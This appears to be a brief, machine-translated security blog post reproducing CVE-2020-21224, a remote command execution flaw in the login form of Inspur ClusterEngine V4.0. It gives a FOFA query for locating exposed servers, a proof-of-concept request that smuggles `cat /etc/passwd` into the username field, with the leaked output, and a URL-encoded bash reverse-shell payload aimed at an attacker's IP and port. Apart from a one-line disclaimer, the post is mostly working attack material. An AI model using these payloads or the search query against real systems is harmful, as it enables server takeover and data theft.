wave ClusterEngineV4.0 Remote command execution vulnerability CVE-2020-21224

This article is only for study , It is strictly forbidden to use it for illegal purposes , Otherwise, we will be responsible for the consequences .

Vulnerability profile

Dangerous characters in Inspur server cluster management system are not filtered , Causes remote command execution

Holes affect

wave ClusterEngineV4.0

FOFA grammar

title="TSCEV4.0"

Loophole recurrence

The login page is as follows

POC

POC test ( appear  root:x:0:0  There are loopholes )
op=login&username=test`$(cat /etc/passwd)`

{"err":"/bin/sh: root:x:0:0:root:/root:/bin/bash: No such file or directory\n","exitcode":1,"out":"the user test does not exist\nerror:1\n"}

 rebound shell
op=login&username=test`$(bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}}%2F{PORT}%200%3E%261)`